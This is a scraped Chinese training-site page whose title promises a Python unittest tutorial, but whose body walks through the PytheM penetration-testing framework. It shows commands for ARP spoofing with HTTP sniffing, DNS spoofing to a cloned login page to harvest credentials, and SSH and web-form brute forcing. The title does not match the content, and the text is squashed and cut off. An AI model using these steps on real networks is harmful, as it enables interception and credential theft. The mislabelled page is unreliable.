<option id="mwy0y"><strong id="mwy0y"></strong></option>
  • <ul id="mwy0y"><sup id="mwy0y"></sup></ul>
  • <ul id="mwy0y"></ul>
  • <del id="mwy0y"><dfn id="mwy0y"></dfn></del><ul id="mwy0y"><sup id="mwy0y"></sup></ul>
  • <abbr id="mwy0y"></abbr>

    千鋒教育-做有情懷、有良心、有品質(zhì)的職業(yè)教育機(jī)構(gòu)

    400-811-9990
    手機(jī)站
    千鋒教育

    千鋒學(xué)習(xí)站 | 隨時隨地免費學(xué)

    千鋒教育

    掃一掃進(jìn)入千鋒手機(jī)站

    領(lǐng)取全套視頻
    千鋒教育

    關(guān)注千鋒學(xué)習(xí)站小程序
    隨時隨地免費學(xué)習(xí)課程

    上海
    • 北京
    • 鄭州
    • 武漢
    • 成都
    • 西安
    • 沈陽
    • 廣州
    • 南京
    • 深圳
    • 大連
    • 青島
    • 杭州
    • 重慶
    當(dāng)前位置:長沙千鋒IT培訓(xùn)  >  技術(shù)干貨  >  Python的Unittest單元測試使用詳解

    Python的Unittest單元測試使用詳解

    來源:千鋒教育
    發(fā)布人:xqq
    時間: 2023-11-06 09:00:13

    PytheM是一個Python滲透測試框架。它只能在osnGNU/LinuxOS系統(tǒng)上運行。

    安裝

    $sudoapt-getupdate$sudoapt-getinstalllibasound-devlibjack-jackd2-devportaudio19-devpython-pyaudiobuild-essentialpython-devlibnetfilter-queue-devlibespeak1libffi-devlibssl-dev$sudogitclonehttps://github.com/m4n3dw0lf/PytheM/$cdPytheM$sudopipinstall-rrequirements.txt

    運行

    $sudo./pythem

    例子

    ARP欺騙-HTTP中間人攻擊

    命令:

    pythem>setinterface[+]Entertheinterface:wlan0pythem>setgateway[+]Enterthegateway:192.168.1.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>sniff[+]Enterthefilter:http

    ARP+DNS欺騙-重定向到偽造的頁面,收集登錄憑證

    使用SET等克隆工具克隆你選中的網(wǎng)站,并部署在Apache2上

    命令:

    pythem>settarget[+]Enterthetarget(s):192.168.0.8pythem>setinterfacewlan0pythem>setgateway192.168.0.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>dnsspoofstart[+]Domaintobespoofed:www.google.com[+]IPaddresstoberedirected:192.168.0.6[+]DNSspoofinginitialized.pythem>sniffdns

    SSH暴破-暴力破解

    pythem>servicesshstartpythem>settarget[+]Enterthetarget(s):127.0.0.1pythem>setfilewordlist.txtpythem>brute-forcessh[+]Entertheusernametobruteforce:anon123

    Web頁面參數(shù)暴力破解

    首先獲取web頁面登錄時的參數(shù)格式id=value

    顯示重定向頁面,如果定向到一個不同的頁面則說明猜解正確。

    命令

    pythem>settargethttp://127.0.0.1/pythem>setfile[+]Enterthepathtothefile:wordlist.txtpythem>brute-forcewebform[+]Brute-Formauthenticationinitialized.[+]Entertheinputidoftheusernamebox:vSIS_ID[+]Entertheinputidofthepasswordbox:vSIS_PASS[+]Entertheusernametobrute-forcetheformulary:root

    URL內(nèi)容爆破

    pythem>settarget[+]Enterthetarget(s):http://testphp.vulnweb.com/index.php?id=pythem>setfile1to100.txtpythem>brute-forceurl[+]ContentURLbruterinitialized.

    功能

    [PytheM–PenetrationTestingFrameworkv0.3.2]

    help:

    打印幫助信息。

    exit/quit:

    退出程序。

    set:

    設(shè)置變量的值,參數(shù):

    interface

    gateway

    target

    file

    arpmode例子:

    pythem>setinterface|openinputtoset

    或者

    pythem>setinterfacewlan0|don'topeninputtosetvalue

    print:

    打印變量的值,例子:

    pythem>printgateway

    scan:

    進(jìn)行tcp/manualport/arp掃描.

    (應(yīng)該在設(shè)置完網(wǎng)卡和目標(biāo)后再調(diào)用)例子:

    pythem>scan

    或者

    pythem>scantcp

    arpspoof:

    開始或結(jié)束arpspoofing攻擊.(使用rep或req可以設(shè)置arp欺騙的模式,rep表示欺騙響應(yīng),req表示欺騙請求)

    參數(shù)

    start

    stop

    例子:

    arpspoofstartarpspoofstop

    dnsspoof:

    開始dnsspoofing攻擊.(應(yīng)該在arp欺騙攻擊開始后再調(diào)用)例子:

    pythem>dnsspoofstartpythem>dnsspoofstop

    sniff:

    開始嗅探數(shù)據(jù)包(應(yīng)該在設(shè)置網(wǎng)卡后再調(diào)用)例子:

    pythem>sniffhttp

    或者

    pythem>sniff

    [+]Enterthefilter:port1337andhost10.0.1.5|tcpdumplikeformatorhttp,dnsspecificfilter.

    pforensic:

    開始分析數(shù)據(jù)包(應(yīng)該在設(shè)置完網(wǎng)卡和.pcap文件后調(diào)用)例子:

    pythem>pforensicpforensic>help

    brute-force:

    開始暴力破解攻擊(應(yīng)該在設(shè)置完目標(biāo)和字典文件路徑后調(diào)用)參數(shù):

    ssh|目標(biāo)是IP地址ipaddressastargeturl|目標(biāo)是url(包含http://或https://)webform|目標(biāo)是url(包含http://或https://)例子:pythem>brute-forcewebformpythem>brute-forcessh

    geoip:

    顯示IP地址的大概位置(應(yīng)該在設(shè)置目標(biāo)(IP地址)后再調(diào)用)例子:

    pythem>geoip

    或者

    pythem>geoip8.8.8.8

    decodeandencode:

    以選擇的模式解碼和編碼字符串,例子:

    pythem>decodebase64pythem>encodeascii

    cookiedecode:

    解碼base64url編碼的cookie的值,例子:

    pythem>cookiedecode

    其它在控制臺可以執(zhí)行的命令,比如cd,ls,nano,cat等。

    Jarvis–聲音控制助手

    [*]jarvistypejarvis-helptoseethejarvishelppage.examples:pythem>jarvis(以語音識

    以上內(nèi)容為大家介紹了Python的Unittest單元測試使用詳解,希望對大家有所幫助,如果想要了解更多Python相關(guān)知識,請關(guān)注IT培訓(xùn)機(jī)構(gòu):千鋒教育。

    聲明:本站稿件版權(quán)均屬千鋒教育所有,未經(jīng)許可不得擅自轉(zhuǎn)載。

    猜你喜歡LIKE

    python實現(xiàn)WSGI的框架

    2023-11-13

    python打開文本文件有哪些方法?

    2023-11-13

    python使用loguru操作日志

    2023-11-13

    最新文章NEW

    python-=是什么意思

    2023-11-13

    pythonre是什么?

    2023-11-13

    python列表追加元素出錯的解決

    2023-11-13

    相關(guān)推薦HOT

    更多>>

    快速通道 更多>>

    最新開班信息 更多>>

    網(wǎng)友熱搜 更多>>